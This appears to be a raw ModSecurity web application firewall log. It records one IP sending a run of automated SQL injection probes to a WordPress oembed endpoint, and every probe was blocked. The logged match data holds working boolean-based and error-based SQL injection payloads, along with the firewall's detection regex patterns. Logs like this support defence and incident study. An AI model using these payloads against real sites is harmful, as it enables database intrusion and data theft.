141.98.81.52:56970] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr261-wCyyCVFXh0DMS2iQAAAJE"] [Thu Aug 15 03:22:48.352525 2024] [:error] [pid 31519:tid 139653839529728] [client 141.98.81.52:56972] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr262HxeJlWfH1pdny5XWwAAANM"] [Thu Aug 15 03:22:48.754966 2024] [:error] [pid 31519:tid 139653805958912] [client 141.98.81.52:56974] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr262HxeJlWfH1pdny5XXAAAANc"] [Thu Aug 15 03:22:49.271734 2024] [:error] [pid 31519:tid 139653915064064] [client 141.98.81.52:56976] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr262XxeJlWfH1pdny5XXQAAAMo"] [Thu Aug 15 03:22:49.756425 2024] [:error] [pid 31519:tid 139653881493248] [client 141.98.81.52:56980] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr262XxeJlWfH1pdny5XXgAAAM4"] [Thu Aug 15 03:22:50.178960 2024] [:error] [pid 31335:tid 139654058071808] [client 141.98.81.52:56982] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr262m0MD5oChETZltkVWgAAAAE"] [Thu Aug 15 03:23:19.933594 2024] [:error] [pid 31519:tid 139653814351616] [client 141.98.81.52:57002] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 6740= found within ARGS:format: xml) AND 6740=5114 AND (2309=2309"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr2693xeJlWfH1pdny5XZAAAANY"] [Thu Aug 15 03:23:20.266873 2024] [:error] [pid 31519:tid 139653889885952] [client 141.98.81.52:57006] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 1154= found within ARGS:format: xml) AND 1154=1154 AND (3382=3382"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26-HxeJlWfH1pdny5XZQAAAM0"] [Thu Aug 15 03:23:20.702274 2024] [:error] [pid 31337:tid 139653797566208] [client 141.98.81.52:57008] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 1226= found within ARGS:format: xml AND 1226=2108"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26-OwCyyCVFXh0DMS2iwAAAJg"] [Thu Aug 15 03:23:21.151658 2024] [:error] [pid 31337:tid 139653898278656] [client 141.98.81.52:57010] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 1154= found within ARGS:format: xml AND 1154=1154"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26-ewCyyCVFXh0DMS2jAAAAIw"] [Thu Aug 15 03:23:21.567102 2024] [:error] [pid 31519:tid 139654049679104] [client 141.98.81.52:57014] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 7286= found within ARGS:format: xml') AND 7286=8188 AND ('oqny'='oqny"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26-XxeJlWfH1pdny5XZgAAAMI"] [Thu Aug 15 03:23:21.848510 2024] [:error] [pid 31336:tid 139653881493248] [client 141.98.81.52:57016] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 1154= found within ARGS:format: xml') AND 1154=1154 AND ('nMgQ'='nMgQ"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26-UPAyXqJhbW53WyPWQAAAE4"] [Thu Aug 15 03:23:22.258333 2024] [:error] [pid 31336:tid 139653873100544] [client 141.98.81.52:57018] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 2885= found within ARGS:format: xml' AND 2885=8414 AND 'kail'='kail"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26-kPAyXqJhbW53WyPWgAAAE8"] [Thu Aug 15 03:23:22.596300 2024] [:error] [pid 31337:tid 139653873100544] [client 141.98.81.52:57020] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 1154= found within ARGS:format: xml' AND 1154=1154 AND 'nuyu'='nuyu"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26-uwCyyCVFXh0DMS2jQAAAI8"] [Thu Aug 15 03:23:22.975270 2024] [:error] [pid 31519:tid 139653940242176] [client 141.98.81.52:57022] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 2067= found within ARGS:format: xml%' AND 2067=1904 AND '%'='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26-nxeJlWfH1pdny5XZwAAAMc"] [Thu Aug 15 03:23:23.272648 2024] [:error] [pid 31337:tid 139653906671360] [client 141.98.81.52:57024] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 1154= found within ARGS:format: xml%' AND 1154=1154 AND '%'='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26--wCyyCVFXh0DMS2jgAAAIs"] [Thu Aug 15 03:23:23.687375 2024] [:error] [pid 31519:tid 139653856315136] [client 141.98.81.52:57026] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 4797= found within ARGS:format: xml AND 4797=6096-- IeCH"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26-3xeJlWfH1pdny5XaAAAANE"] [Thu Aug 15 03:23:23.930992 2024] [:error] [pid 31519:tid 139654041286400] [client 141.98.81.52:57028] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 1154= found within ARGS:format: xml AND 1154=1154-- UTVk"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26-3xeJlWfH1pdny5XaQAAAMM"] [Thu Aug 15 03:23:24.481528 2024] [:error] [pid 31519:tid 139653805958912] [client 141.98.81.52:57030] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26_HxeJlWfH1pdny5XagAAANc"] [Thu Aug 15 03:23:24.772625 2024] [:error] [pid 31337:tid 139653805958912] [client 141.98.81.52:57032] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26_OwCyyCVFXh0DMS2jwAAAJc"] [Thu Aug 15 03:23:25.558109 2024] [:error] [pid 31519:tid 139653847922432] [client 141.98.81.52:57034] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: (0x7162626271 found within ARGS:format: xml) AND (SELECT 6302 FROM(SELECT COUNT(*),CONCAT(0x7162626271,(SELECT (ELT(6302=6302,1))),0x7162707871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (5354=5354"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26_XxeJlWfH1pdny5XawAAANI"] [Thu Aug 15 03:23:25.931892 2024] [:error] [pid 31519:tid 139653864707840] [client 141.98.81.52:57036] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: (0x7162626271 found within ARGS:format: xml AND (SELECT 6302 FROM(SELECT COUNT(*),CONCAT(0x7162626271,(SELECT (ELT(6302=6302,1))),0x7162707871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26_XxeJlWfH1pdny5XbAAAANA"] [Thu Aug 15 03:23:26.269920 2024] [:error] [pid 31337:tid 139653847922432] [client 141.98.81.52:57038] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: (0x7162626271 found within ARGS:format: xml') AND (SELECT 6302 FROM(SELECT COUNT(*),CONCAT(0x7162626271,(SELECT (ELT(6302=6302,1))),0x7162707871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('Ykwg'='Ykwg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26_uwCyyCVFXh0DMS2kAAAAJI"] [Thu Aug 15 03:23:26.806730 2024] [:error] [pid 31337:tid 139653822744320] [client 141.98.81.52:57040] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: (0x7162626271 found within ARGS:format: xml' AND (SELECT 6302 FROM(SELECT COUNT(*),CONCAT(0x7162626271,(SELECT (ELT(6302=6302,1))),0x7162707871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'zwjN'='zwjN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26_uwCyyCVFXh0DMS2kQAAAJU"] [Thu Aug 15 03:23:27.219610 2024] [:error] [pid 31519:tid 139653898278656] [client 141.98.81.52:57044] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: (0x7162626271 found within ARGS:format: xml%' AND (SELECT 6302 FROM(SELECT COUNT(*),CONCAT(0x7162626271,(SELECT (ELT(6302=6302,1))),0x7162707871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag 